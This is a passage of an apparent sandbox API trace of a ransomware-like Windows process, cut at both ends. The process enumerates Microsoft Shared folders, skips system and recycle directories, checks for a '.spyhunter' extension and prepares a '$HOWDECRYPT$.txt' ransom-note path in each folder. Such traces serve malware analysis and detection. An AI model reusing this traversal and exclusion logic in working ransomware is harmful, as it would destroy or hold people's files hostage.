Files\\Microsoft Shared\\GRPHFLT\\MS.PNG") returned 65 [0086.068] GetProcessHeap () returned 0x2c0000 [0086.068] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc4) returned 0x3307a0 [0086.068] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x32fb30, Size=0x6b8) returned 0x32fb30 [0086.068] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0086.068] lstrcmpiW (lpString1="MS.WPG", lpString2="Windows") returned -1 [0086.068] lstrlenW (lpString="Windows") returned 7 [0086.068] lstrcmpiW (lpString1="MS.WPG", lpString2="$Recycle.bin") returned 1 [0086.068] lstrlenW (lpString="$Recycle.bin") returned 12 [0086.068] lstrcmpiW (lpString1="MS.WPG", lpString2="System Volume Information") returned -1 [0086.068] lstrlenW (lpString="System Volume Information") returned 25 [0086.068] wnsprintfW (in: pszDest=0x34f030, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.WPG") returned 65 [0086.068] StrStrIW (lpFirst="MS.WPG", lpSrch=".spyhunter") returned 0x0 [0086.068] lstrcmpW (lpString1="MS.WPG", lpString2="$HOWDECRYPT$.txt") returned 1 [0086.068] lstrcmpW (lpString1="MS.WPG", lpString2="_uninstalling_.png") returned 1 [0086.068] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.WPG") returned 65 [0086.068] GetProcessHeap () returned 0x2c0000 [0086.068] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc4) returned 0x330870 [0086.068] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x32fb30, Size=0x6c0) returned 0x32fb30 [0086.068] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0086.068] lstrcmpiW (lpString1="PICTIM32.FLT", lpString2="Windows") returned -1 [0086.068] lstrlenW (lpString="Windows") returned 7 [0086.068] lstrcmpiW (lpString1="PICTIM32.FLT", lpString2="$Recycle.bin") returned 1 [0086.068] lstrlenW (lpString="$Recycle.bin") returned 12 [0086.068] lstrcmpiW (lpString1="PICTIM32.FLT", lpString2="System Volume Information") returned -1 [0086.068] lstrlenW (lpString="System Volume Information") returned 25 [0086.069] wnsprintfW (in: pszDest=0x34f030, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\PICTIM32.FLT") returned 71 [0086.069] StrStrIW (lpFirst="PICTIM32.FLT", lpSrch=".spyhunter") returned 0x0 [0086.069] lstrcmpW (lpString1="PICTIM32.FLT", lpString2="$HOWDECRYPT$.txt") returned 1 [0086.069] lstrcmpW (lpString1="PICTIM32.FLT", lpString2="_uninstalling_.png") returned 1 [0086.069] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\PICTIM32.FLT") returned 71 [0086.069] GetProcessHeap () returned 0x2c0000 [0086.069] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xd0) returned 0x33f288 [0086.069] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x32fb30, Size=0x6c8) returned 0x32fb30 [0086.069] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0086.069] lstrcmpiW (lpString1="PNG32.FLT", lpString2="Windows") returned -1 [0086.069] lstrlenW (lpString="Windows") returned 7 [0086.069] lstrcmpiW (lpString1="PNG32.FLT", lpString2="$Recycle.bin") returned 1 [0086.069] lstrlenW (lpString="$Recycle.bin") returned 12 [0086.069] lstrcmpiW (lpString1="PNG32.FLT", lpString2="System Volume Information") returned -1 [0086.069] lstrlenW (lpString="System Volume Information") returned 25 [0086.069] wnsprintfW (in: pszDest=0x34f030, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\PNG32.FLT") returned 68 [0086.069] StrStrIW (lpFirst="PNG32.FLT", lpSrch=".spyhunter") returned 0x0 [0086.069] lstrcmpW (lpString1="PNG32.FLT", lpString2="$HOWDECRYPT$.txt") returned 1 [0086.069] lstrcmpW (lpString1="PNG32.FLT", lpString2="_uninstalling_.png") returned 1 [0086.069] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\PNG32.FLT") returned 68 [0086.069] GetProcessHeap () returned 0x2c0000 [0086.069] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xca) returned 0x33f360 [0086.069] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x32fb30, Size=0x6d0) returned 0x32fb30 [0086.069] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0086.069] lstrcmpiW (lpString1="WPGIMP32.FLT", lpString2="Windows") returned 1 [0086.069] lstrlenW (lpString="Windows") returned 7 [0086.069] lstrcmpiW (lpString1="WPGIMP32.FLT", lpString2="$Recycle.bin") returned 1 [0086.069] lstrlenW (lpString="$Recycle.bin") returned 12 [0086.069] lstrcmpiW (lpString1="WPGIMP32.FLT", lpString2="System Volume Information") returned 1 [0086.069] lstrlenW (lpString="System Volume Information") returned 25 [0086.069] wnsprintfW (in: pszDest=0x34f030, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\WPGIMP32.FLT") returned 71 [0086.069] StrStrIW (lpFirst="WPGIMP32.FLT", lpSrch=".spyhunter") returned 0x0 [0086.070] lstrcmpW (lpString1="WPGIMP32.FLT", lpString2="$HOWDECRYPT$.txt") returned 1 [0086.070] lstrcmpW (lpString1="WPGIMP32.FLT", lpString2="_uninstalling_.png") returned 1 [0086.070] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\WPGIMP32.FLT") returned 71 [0086.070] GetProcessHeap () returned 0x2c0000 [0086.070] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xd0) returned 0x33f438 [0086.070] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x32fb30, Size=0x6d8) returned 0x32fb30 [0086.070] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 0 [0086.070] FindClose (in: hFindFile=0x335f60 | out: hFindFile=0x335f60) returned 1 [0086.070] wnsprintfW (in: pszDest=0x34f030, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\$HOWDECRYPT$.txt") returned 75 [0086.070] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\$HOWDECRYPT$.txt") returned 75 [0086.070] GetProcessHeap () returned 0x2c0000 [0086.071] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xd8) returned 0x330940 [0086.071] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x32fb30, Size=0x6e0) returned 0x32fb30 [0086.071] FindNextFileW (in: hFindFile=0x335f20, lpFindFileData=0x298f348 | out: lpFindFileData=0x298f348) returned 1 [0086.071] lstrcmpiW (lpString1="Help", lpString2="Windows") returned -1 [0086.071] lstrlenW (lpString="Windows") returned 7 [0086.071] lstrcmpiW (lpString1="Help", lpString2="$Recycle.bin") returned 1 [0086.071] lstrlenW (lpString="$Recycle.bin") returned 12 [0086.071] lstrcmpiW (lpString1="Help", lpString2="System Volume Information") returned -1 [0086.071] lstrlenW (lpString="System Volume Information") returned 25 [0086.071] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Help") returned 55 [0086.071] lstrcmpW (lpString1="Help", lpString2=".") returned 1 [0086.071] lstrcmpW (lpString1="Help", lpString2="..") returned 1 [0086.071] GetProcessHeap () returned 0x2c0000 [0086.071] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x35f878 [0086.072] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Help\\*") returned 57 [0086.072] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Help\\*", lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 0x335f60 [0086.075] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0086.075] lstrlenW (lpString="Windows") returned 7 [0086.075] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0086.075] lstrlenW (lpString="$Recycle.bin") returned 12 [0086.075] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0086.075] lstrlenW (lpString="System Volume Information") returned 25 [0086.075] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Help\\.") returned 57 [0086.075] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0086.075] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0086.076] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0086.076] lstrlenW (lpString="Windows") returned 7 [0086.076] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0086.076] lstrlenW (lpString="$Recycle.bin") returned 12 [0086.076] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0086.076] lstrlenW (lpString="System Volume Information") returned 25 [0086.076] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Help\\..") returned 58 [0086.076] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0086.076] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0086.076] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0086.076] lstrcmpiW (lpString1="hxds.dll", lpString2="Windows") returned -1 [0086.076] lstrlenW (lpString="Windows") returned 7 [0086.076] lstrcmpiW (lpString1="hxds.dll", lpString2="$Recycle.bin") returned 1 [0086.076] lstrlenW (lpString="$Recycle.bin") returned 12 [0086.076] lstrcmpiW (lpString1="hxds.dll", lpString2="System Volume Information") returned -1 [0086.076] lstrlenW (lpString="System Volume Information") returned 25 [0086.076] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Help\\hxds.dll") returned 64 [0086.076] StrStrIW (lpFirst="hxds.dll", lpSrch=".spyhunter") returned 0x0 [0086.076] lstrcmpW (lpString1="hxds.dll", lpString2="$HOWDECRYPT$.txt") returned 1 [0086.076] lstrcmpW (lpString1="hxds.dll", lpString2="_uninstalling_.png") returned 1 [0086.076] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Help\\hxds.dll") returned 64 [0086.076] GetProcessHeap () returned 0x2c0000 [0086.076] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc2) returned 0x36f8c0 [0086.076] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x32fb30, Size=0x6e8) returned 0x36f990 [0086.076] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0086.076] lstrcmpiW (lpString1="ITIRCL55.DLL", lpString2="Windows") returned -1 [0086.076] lstrlenW (lpString="Windows") returned 7 [0086.076] lstrcmpiW (lpString1="ITIRCL55.DLL", lpString2="$Recycle.bin") returned 1 [0086.077] lstrlenW (lpString="$Recycle.bin") returned 12 [0086.077] lstrcmpiW (lpString1="ITIRCL55.DLL", lpString2="System Volume Information") returned -1 [0086.077] lstrlenW (lpString="System Volume Information") returned 25 [0086.077] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Help\\ITIRCL55.DLL") returned 68 [0086.077] StrStrIW (lpFirst="ITIRCL55.DLL", lpSrch=".spyhunter") returned 0x0 [0086.077] lstrcmpW (lpString1="ITIRCL55.DLL", lpString2="$HOWDECRYPT$.txt") returned 1 [0086.077] lstrcmpW (lpString1="ITIRCL55.DLL", lpString2="_uninstalling_.png") returned 1 [0086.077] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Help\\ITIRCL55.DLL") returned 68 [0086.077] GetProcessHeap () returned 0x2c0000 [0086.077] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xca) returned 0x33f510 [0086.077] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x36f990, Size=0x6f0) returned 0x36f990 [0086.077] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0086.077] lstrcmpiW (lpString1="msitss55.dll", lpString2="Windows") returned -1 [0086.077] lstrlenW (lpString="Windows") returned 7 [0086.077] lstrcmpiW (lpString1="msitss55.dll", lpString2="$Recycle.bin") returned 1 [0086.077] lstrlenW (lpString="$Recycle.bin") returned 12 [0086.077] lstrcmpiW (lpString1="msitss55.dll", lpString2="System Volume Information") returned -1 [0086.077] lstrlenW (lpString="System Volume Information") returned 25 [0086.077] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Help\\msitss55.dll") returned 68 [0086.077] StrStrIW (lpFirst="msitss55.dll", lpSrch=".spyhunter") returned 0x0 [0086.077] lstrcmpW (lpString1="msitss55.dll", lpString2="$HOWDECRYPT$.txt") returned 1 [0086.077] lstrcmpW (lpString1="msitss55.dll", lpString2="_uninstalling_.png") returned 1 [0086.077] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Help\\msitss55.dll") returned 68 [0086.077] GetProcessHeap () returned 0x2c0000 [0086.077] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xca) returned 0x33f5e8 [0086.077] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x36f990, Size=0x6f8) returned 0x36f990 [0086.077] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 0 [0086.078] FindClose (in: hFindFile=0x335f60 | out: hFindFile=0x335f60) returned 1 [0086.078] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Help\\$HOWDECRYPT$.txt") returned 72 [0086.078] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Help\\$HOWDECRYPT$.txt") returned 72 [0086.078] GetProcessHeap () returned 0x2c0000 [0086.078] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xd2) returned 0x32fb30 [0086.078] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x36f990, Size=0x700) returned 0x36f990 [0086.079] FindNextFileW (in: hFindFile=0x335f20, lpFindFileData=0x298f348 | out: lpFindFileData=0x298f348) returned 1 [0086.079] lstrcmpiW (lpString1="ink", lpString2="Windows") returned -1 [0086.079] lstrlenW (lpString="Windows") returned 7 [0086.079] lstrcmpiW (lpString1="ink", lpString2="$Recycle.bin") returned 1 [0086.079] lstrlenW (lpString="$Recycle.bin") returned 12 [0086.079] lstrcmpiW (lpString1="ink", lpString2="System Volume Information") returned -1 [0086.079] lstrlenW (lpString="System Volume Information") returned 25 [0086.079] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink") returned 54 [0086.079] lstrcmpW (lpString1="ink", lpString2=".") returned 1 [0086.079] lstrcmpW (lpString1="ink", lpString2="..") returned 1 [0086.079] GetProcessHeap () returned 0x2c0000 [0086.079] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x35f878 [0086.080] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*") returned 56 [0086.080] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*", lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 0x335f60 [0086.080] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0086.080] lstrlenW (lpString="Windows") returned 7 [0086.080] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0086.080] lstrlenW (lpString="$Recycle.bin") returned 12 [0086.080] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0086.080] lstrlenW (lpString="System Volume Information") returned 25 [0086.080] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\.") returned 56 [0086.080] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0086.080] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0086.080] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0086.080] lstrlenW (lpString="Windows") returned 7 [0086.080] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0086.080] lstrlenW (lpString="$Recycle.bin") returned 12 [0086.080] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0086.080] lstrlenW (lpString="System Volume Information") returned 25 [0086.080] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\..") returned 57 [0086.081] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0086.081] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0086.081] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0086.081] lstrcmpiW (lpString1="Alphabet.xml", lpString2="Windows") returned -1 [0086.081] lstrlenW (lpString="Windows") returned 7 [0086.081] lstrcmpiW (lpString1="Alphabet.xml", lpString2="$Recycle.bin") returned 1 [0086.081] lstrlenW (lpString="$Recycle.bin") returned 12 [0086.081] lstrcmpiW (lpString1="Alphabet.xml", lpString2="System Volume Information") returned -1 [0086.081] lstrlenW (lpString="System Volume Information") returned 25 [0086.081] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml") returned 67 [0086.081] StrStrIW (lpFirst="Alphabet.xml", lpSrch=".spyhunter") returned 0x0 [0086.081] lstrcmpW (lpString1="Alphabet.xml", lpString2="$HOWDECRYPT$.txt") returned 1 [0086.081] lstrcmpW (lpString1="Alphabet.xml", lpString2="_uninstalling_.png") returned 1 [0086.081] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml") returned 67 [0086.081] GetProcessHeap () returned 0x2c0000 [0086.081] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x32fc10 [0086.081] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x36f990, Size=0x708) returned 0x36f990 [0086.081] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0086.081] lstrcmpiW (lpString1="ar-SA", lpString2="Windows") returned -1 [0086.081] lstrlenW (lpString="Windows") returned 7 [0086.081] lstrcmpiW (lpString1="ar-SA", lpString2="$Recycle.bin") returned 1 [0086.082] lstrlenW (lpString="$Recycle.bin") returned 12 [0086.082] lstrcmpiW (lpString1="ar-SA", lpString2="System Volume Information") returned -1 [0086.082] lstrlenW (lpString="System Volume Information") returned 25 [0086.082] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ar-SA") returned 60 [0086.082] lstrcmpW (lpString1="ar-SA", lpString2=".") returned 1 [0086.082] lstrcmpW (lpString1="ar-SA", lpString2="..") returned 1 [0086.082] GetProcessHeap () returned 0x2c0000 [0086.082] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x340fe8 [0086.082] wnsprintfW (in: pszDest=0x340fe8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ar-SA\\*") returned 62 [0086.083] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ar-SA\\*", lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 0x335fa0 [0086.098] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0086.098] lstrlenW (lpString="Windows") returned 7 [0086.098] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0086.098] lstrlenW (lpString="$Recycle.bin") returned 12 [0086.098] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0086.098] lstrlenW (lpString="System Volume Information") returned 25 [0086.098] wnsprintfW (in: pszDest=0x340fe8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ar-SA\\.") returned 62 [0086.098] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0086.098] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0086.098] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0086.098] lstrlenW (lpString="Windows") returned 7 [0086.098] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0086.098] lstrlenW (lpString="$Recycle.bin") returned 12 [0086.098] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0086.099] lstrlenW (lpString="System Volume Information") returned 25 [0086.099] wnsprintfW (in: pszDest=0x340fe8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ar-SA\\..") returned 63 [0086.099] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0086.099] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0086.099] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0086.099] lstrcmpiW (lpString1="tipresx.dll.mui", lpString2="Windows") returned -1 [0086.099] lstrlenW (lpString="Windows") returned 7 [0086.099] lstrcmpiW (lpString1="tipresx.dll.mui", lpString2="$Recycle.bin") returned 1 [0086.099] lstrlenW (lpString="$Recycle.bin") returned 12 [0086.099] lstrcmpiW (lpString1="tipresx.dll.mui", lpString2="System Volume Information") returned 1 [0086.099] lstrlenW (lpString="System Volume Information") returned 25 [0086.099] wnsprintfW (in: pszDest=0x340fe8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ar-SA\\tipresx.dll.mui") returned 76 [0086.099] StrStrIW (lpFirst="tipresx.dll.mui", lpSrch=".spyhunter") returned 0x0 [0086.099] lstrcmpW (lpString1="tipresx.dll.mui", lpString2="$HOWDECRYPT$.txt") returned 1 [0086.099] lstrcmpW (lpString1="tipresx.dll.mui", lpString2="_uninstalling_.png") returned 1 [0086.099] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ar-SA\\tipresx.dll.mui") returned 76 [0086.099] GetProcessHeap () returned 0x2c0000 [0086.099] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xda) returned 0x3272b0 [0086.099] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x36f990, Size=0x710) returned 0x3710a8 [0086.099] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 0 [0086.099] FindClose (in: hFindFile=0x335fa0 | out: hFindFile=0x335fa0) returned 1 [0086.099] wnsprintfW (in: pszDest=0x340fe8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ar-SA\\$HOWDECRYPT$.txt") returned 77 [0086.099] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ar-SA\\$HOWDECRYPT$.txt") returned 77 [0086.099] GetProcessHeap () returned 0x2c0000 [0086.099] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xdc) returned 0x327908 [0086.100] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3710a8, Size=0x718) returned 0x3710a8 [0086.100] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0086.100] lstrcmpiW (lpString1="bg-BG", lpString2="Windows") returned -1 [0086.100] lstrlenW (lpString="Windows") returned 7 [0086.100] lstrcmpiW (lpString1="bg-BG", lpString2="$Recycle.bin") returned 1 [0086.100] lstrlenW (lpString="$Recycle.bin") returned 12 [0086.100] lstrcmpiW (lpString1="bg-BG", lpString2="System Volume Information") returned -1 [0086.100] lstrlenW (lpString="System Volume Information") returned 25 [0086.100] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\bg-BG") returned 60 [0086.100] lstrcmpW (lpString1="bg-BG", lpString2=".") returned 1 [0086.100] lstrcmpW (lpString1="bg-BG", lpString2="..") returned 1 [0086.100] GetProcessHeap () returned 0x2c0000 [0086.100] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x340fe8 [0086.100] wnsprintfW (in: pszDest=0x340fe8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\bg-BG\\*") returned 62 [0086.100] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\bg-BG\\*", lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 0x335fa0 [0086.101] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0086.101] lstrlenW (lpString="Windows") returned 7 [0086.101] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0086.101] lstrlenW (lpString="$Recycle.bin") returned 12 [0086.101] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0086.101] lstrlenW (lpString="System Volume Information") returned 25 [0086.101] wnsprintfW (in: pszDest=0x340fe8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\bg-BG\\.") returned 62 [0086.101] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0086.101] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0086.101] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0086.101] lstrlenW (lpString="Windows") returned 7 [0086.101] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0086.101] lstrlenW (lpString="$Recycle.bin") returned 12 [0086.101] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0086.101] lstrlenW (lpString="System Volume Information") returned 25 [0086.101] wnsprintfW (in: pszDest=0x340fe8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\bg-BG\\..") returned 63 [0086.101] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0086.101] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0086.101] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0086.101] lstrcmpiW (lpString1="tipresx.dll.mui", lpString2="Windows") returned -1 [0086.101] lstrlenW (lpString="Windows") returned 7 [0086.101] lstrcmpiW (lpString1="tipresx.dll.mui", lpString2="$Recycle.bin") returned 1 [0086.102] lstrlenW (lpString="$Recycle.bin") returned 12 [0086.102] lstrcmpiW (lpString1="tipresx.dll.mui", lpString2="System Volume Information") returned 1 [0086.102] lstrlenW (lpString="System Volume Information") returned 25 [0086.102] wnsprintfW (in: pszDest=0x340fe8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\bg-BG\\tipresx.dll.mui") returned 76 [0086.102] StrStrIW 